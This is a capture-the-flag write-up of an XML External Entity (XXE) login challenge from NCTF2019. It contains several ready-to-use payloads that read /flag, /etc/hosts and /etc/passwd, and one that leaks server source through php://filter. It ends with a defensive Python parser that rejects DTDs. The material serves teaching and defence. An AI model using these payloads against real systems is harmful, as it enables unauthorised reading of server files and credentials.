[NCTF2019]Fake XML cookbook

This post walks through using an XML External Entity (XXE) vulnerability to bypass a login check: by crafting a special payload, it tries to read a sensitive file on the server.


The challenge is a login form. Weak passwords do not get you in, so capture the request with a proxy.

The parameters are sent as XML, which suggests an XXE vulnerability.

Payload:

```xml
<!DOCTYPE any [<!ENTITY a SYSTEM "file:///flag">]>
<user><username>&a;</username><password>admin</password></user>
```

For the details of XXE attacks, see the other post:
https://blog.youkuaiyun.com/weixin_43749601/article/details/114014875

### NCTF2019 True XML Challenge Solutions and Walkthrough

In the context of the NCTF2019 competition, several challenges involved exploiting XXE (XML External Entity) vulnerabilities within XML documents to achieve various objectives such as file reading or server-side request forgery.

#### Exploiting Basic XXE Vulnerability

An example payload that demonstrates a basic XXE attack is shown below:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///etc/hosts">
]>
<user>
<username>&admin;</username>
<password>1</password>
</user>
```

This payload attempts to read the contents of `/etc/hosts` by defining an external entity `admin`, which references this system file[^2].

#### Advanced File Reading with Different Protocols

When direct access using the `file://` protocol does not work due to restrictions imposed by some parsers, alternative protocols can be used. For instance, PHP's filter wrapper allows for more sophisticated attacks where files are encoded before being sent back to the attacker:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY xee SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user>
<username>&xee;</username>
<password>123123</password>
</user>
```

Here, instead of directly accessing the target file via its path, the content of `doLogin.php` gets base64-encoded through PHP's filtering mechanism prior to transmission[^4].

#### Targeting Specific Files on Server

For scenarios requiring specific sensitive information like flags stored somewhere accessible only internally, crafting payloads targeting these locations becomes crucial:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user>
<username>&admin;</username>
<password>123456</password>
</user>
```

The above snippet aims at retrieving the flag data stored in the file named `flag` under the root directory[^3].

#### General Approach Against Black Box Systems

Even without detailed knowledge about internal structures, one could still attempt common paths known across many systems:

```xml
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<user><username> &xxe; </username><password> 1 </password></user>
```

By referencing well-known Unix/Linux configuration files (`/etc/passwd`) in the entity definition, attackers may gain insights into underlying OS configurations even when no explicit details were provided initially[^5].
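As an added defensive example (not code from the write-up or the challenge), here is a minimal parser for the `<user>` login document shown above that refuses any DOCTYPE or entity declaration. Rejecting the DTD up front stops every payload on this page, whatever URI scheme the entity uses (`file:///flag`, `php://filter`, `/etc/passwd`); the sample requests are constructed, and the handler names are the real `xml.parsers.expat` callbacks.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when the document carries a DOCTYPE or entity declaration."""


def parse_login_xml(data: bytes) -> dict:
    """Parse <user><username>..</username><password>..</password></user>.
    Any DOCTYPE or entity declaration aborts parsing before an entity can be
    resolved, so the payload's URI scheme (file://, php://filter) never matters.
    """
    fields, stack, text = {}, [], []
    p = expat.ParserCreate()
    p.buffer_text = True  # deliver each text node in as few callbacks as possible

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE declarations are not accepted")

    def reject_entity(*_):
        raise UnsafeXML("entity declarations are not accepted")

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def end(name):
        if len(stack) == 2 and stack[0] == "user":  # direct child of <user>
            fields[name] = "".join(text).strip()
        stack.pop()
        text.clear()

    p.StartDoctypeDeclHandler = reject_doctype
    p.EntityDeclHandler = reject_entity
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = text.append
    p.Parse(data, True)
    return fields


def try_parse(data: bytes):
    """Return (fields, None) on success, or (None, reason) when rejected."""
    try:
        return parse_login_xml(data), None
    except (UnsafeXML, expat.ExpatError) as exc:
        return None, str(exc)


# Constructed samples: a benign login and the write-up's XXE payload.
BENIGN = b"<user><username>admin</username><password>admin</password></user>"
XXE = (b'<!DOCTYPE any [<!ENTITY a SYSTEM "file:///flag">]>'
       b"<user><username>&a;</username><password>admin</password></user>")
```

A request that references an undeclared entity without a DOCTYPE is also rejected, because expat reports it as an undefined-entity error.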